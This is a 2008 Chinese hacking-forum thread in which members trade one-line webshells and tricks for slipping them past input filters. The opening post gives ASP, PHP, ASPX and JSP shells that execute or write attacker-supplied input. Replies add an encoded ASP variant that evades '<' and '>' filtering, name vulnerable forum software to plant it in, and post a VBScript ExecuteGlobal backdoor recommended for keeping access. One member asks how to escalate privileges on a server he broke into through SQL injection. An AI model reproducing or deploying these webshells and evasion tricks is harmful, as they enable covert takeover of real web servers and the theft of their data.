‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[讨论]一句话木马的绕过过滤技巧

awolf

晶莹剔透§烈日灼然

Rank: 1

帖子
14 
精华
0 
积分
51 
阅读权限
40 
在线时间
20 小时 
注册时间
2007-12-3 
最后登录
2008-8-16 
楼主 发表于 2008-1-6 10:17  只看该作者

[讨论]一句话木马的绕过过滤技巧

文章作者:Awolf
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

  一句话木马在拿shell的时候总有很大作用,但是经常遇到这样情况:经过过滤后把我们小马都变了个某样了,让我们小菜素手无策!当然有人会说依情况而定,没错是这样的要灵活变通。这个帖子主要和大家讨论下一些常见的情况和如何绕过防注入的方法!让我们学习学习~~
   asp一句话:
复制内容到剪贴板
代码:
<%executerequest("p")%>
php一句话:
复制内容到剪贴板
代码:
<?php eval($_POST[cmd];?>
aspx一句话:
复制内容到剪贴板
代码:
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
jsp一句话:
复制内容到剪贴板
代码:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());
%>
这里主要针对asp和php还有aspx的,这三个比较经常用!

TOP

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1108 小时 
注册时间
2007-10-23 
最后登录
2008-9-5 

资料收集奖 运营支持奖

沙发 发表于 2008-1-6 22:08  只看该作者
一句话的木马并不只是有这些.
脚本语言中大多数和系统交互的函数都能够用来作为后门.

安全性和可用性是不可逆的.

TOP

awolf

晶莹剔透§烈日灼然

Rank: 1

帖子
14 
精华
0 
积分
51 
阅读权限
40 
在线时间
20 小时 
注册时间
2007-12-3 
最后登录
2008-8-16 
椅子 发表于 2008-1-7 21:42  只看该作者
恩,没错,只要我们好好分析充分利用 类似一句话木马可做后门的不只这些。
那么我主要想讨论是针对这些的一些常见的变形技术来达到免杀或者跳过过滤来插入小马。。

TOP

xinfulove

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
30 
阅读权限
40 
在线时间
19 小时 
注册时间
2006-6-4 
最后登录
2008-6-23 
板凳 发表于 2008-1-8 00:43  只看该作者
问一句,没具体说怎么饶过过滤呀?漏啦?

TOP

billycrazy

晶莹剔透§烈日灼然

Rank: 1

帖子
23 
精华
0 
积分
83 
阅读权限
40 
性别
男 
在线时间
88 小时 
注册时间
2006-2-10 
最后登录
2008-8-25 
地板 发表于 2008-1-8 11:21  只看该作者
关于动易2005 ACCESS 顶部菜单设置 ----特效那里加一句话 被过滤 各位是否有招

TOP

asasok

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
22 
阅读权限
40 
性别
男 
在线时间
20 小时 
注册时间
2007-12-31 
最后登录
2008-9-6 
6楼 发表于 2008-1-8 11:30  只看该作者
怎么绕,对什么情况使用什么绕法?

TOP

mlove

mlove

禁止发言

帖子
20 
精华
0 
积分
-6 
阅读权限
性别
男 
来自
邪恶八进制 
在线时间
8 小时 
注册时间
2008-1-8 
最后登录
2008-4-7 
7楼 发表于 2008-1-8 16:59  只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

TOP

xiaohao

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
4 小时 
注册时间
2008-1-9 
最后登录
2008-5-5 
8楼 发表于 2008-1-9 13:42  只看该作者
听的不是懂??

TOP

唐不狐

很黃很暴力

晶莹剔透§烈日灼然

Rank: 1

帖子
147 
精华
2 
积分
576 
阅读权限
50 
性别
男 
来自
china 
在线时间
108 小时 
注册时间
2005-9-27 
最后登录
2008-9-5 
9楼 发表于 2008-1-9 16:13  只看该作者
本帖最大的遗憾:楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的,我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的

TOP

awolf

晶莹剔透§烈日灼然

Rank: 1

帖子
14 
精华
0 
积分
51 
阅读权限
40 
在线时间
20 小时 
注册时间
2007-12-3 
最后登录
2008-8-16 
10楼 发表于 2008-1-10 00:08  只看该作者
引用:
引用第8楼唐不狐于2008-01-09 16:13发表的 :
本帖最大的遗憾:楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的,我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的
恩,这里我只对asp做个简单的变形:
这个是针对于网站过滤了“<”,“>”等我们一句话木马要用到的关键字符,可以这样转换!
asp变形后成为
引用:
┼攠數畣整爠煥敵瑳∨∣┩愾┼砧
这样就绕过了,这个可以用在比如 沸腾注册的插马漏洞,还有现在最新的dvbbs8.1的后他拿shell在圈子设置处的插马。
至于php的还有aspx的还不是很懂,还需要大家帮忙。。。。。
当然asp也不只上面一种,还有很多种,比如转换ASCII码等等。。。。

TOP

seraph1984

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
16 
阅读权限
40 
性别
男 
在线时间
3 小时 
注册时间
2006-7-17 
最后登录
2008-1-14 
11楼 发表于 2008-1-14 01:41  只看该作者
我来发一个我的变形
复制内容到剪贴板
代码:
<script language=VBScript runat=server>if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>
慧,如果还可以再来一次,我还是愿意被你骗,

TOP

jxsaqjh

晶莹剔透§烈日灼然

Rank: 1

帖子
36 
精华
0 
积分
99 
阅读权限
40 
性别
男 
在线时间
16 小时 
注册时间
2006-10-23 
最后登录
2008-8-29 
12楼 发表于 2008-1-14 14:44  只看该作者
引用:
引用第8楼唐不狐于2008-01-09 16:13发表的 :
本帖最大的遗憾:楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的,我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的
不狐兄说的那篇文章哪里可以找到?
jxsaqjh.cn

TOP

゛小︷帅!﹊

晶莹剔透§烈日灼然

Rank: 1

帖子
59 
精华
0 
积分
156 
阅读权限
40 
来自
杭州 
在线时间
152 小时 
注册时间
2007-9-29 
最后登录
2008-8-23 
13楼 发表于 2008-1-27 10:33  只看该作者
复制内容到剪贴板
代码:
<%On Error Resume Next eval request("xsser") %>

TOP

chinaitbo

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
16 
阅读权限
40 
在线时间
1 小时 
注册时间
2008-1-28 
最后登录
2008-2-2 
14楼 发表于 2008-1-28 07:21  只看该作者
由于我刚注册账号,不能发贴,只好把我的问题跟贴求助大家了。
问题:拿到了一个SA注入点,通过阿D工具添加了一个管理员账号,用这个远程桌面登陆,问题就在那,能进去但显示跟去掉EXPLORER这个进程关掉一样的蓝色画面,通过ctrl+alt+del打开任务管理器,从上面的运行那里打开了CMD,但用net user 查看账号时,没有阿D添加的那个账号。通过调用MMC里添加active directory 用户和计算机里面的user项才有阿D添加的账号,我在里面把我的账号添加了domain administrator administrator,但还是没权限调用桌面出来。

看来这台机子已经用来做域用户了,但怎么才突破权限,怎么在这台本地登陆呢。通过阿D添加的账号是域账号,而不是本地账号。

TOP

softbug

技术核心组

Rank: 8Rank: 8

E.S.T核心成员 HRM

帖子
285 
精华
14 
积分
6817 
阅读权限
200 
性别
男 
在线时间
96 小时 
注册时间
2005-1-7 
最后登录
2008-9-3 

软件研发奖 原创技术奖

15楼 发表于 2008-2-5 10:03  只看该作者
ExecuteGlobal ?
论坛地址: http://www.ssk2.cn & www.iisuser.com

TOP

frg87895321

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
13 小时 
注册时间
2007-3-5 
最后登录
2008-9-5 
16楼 发表于 2008-2-12 19:15  只看该作者
<script language=VBScript runat=server>if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>

这个留着当后门很好

TOP

消失再消失

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
116 
精华
2 
积分
3398 
阅读权限
100 
性别
男 
在线时间
195 小时 
注册时间
2007-4-19 
最后登录
2008-9-6 
17楼 发表于 2008-2-16 15:10  只看该作者
一句话  我一直没弄懂怎么去实现绕过闭合过率..
可能是我对asp不懂吧...
记得以前搞一个外挂站点的时候   过滤了<%.
  那时候还是骚总帮我解决的..
关注此帖....
谁用了我的名字...我还得在我名字后加1才行....

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题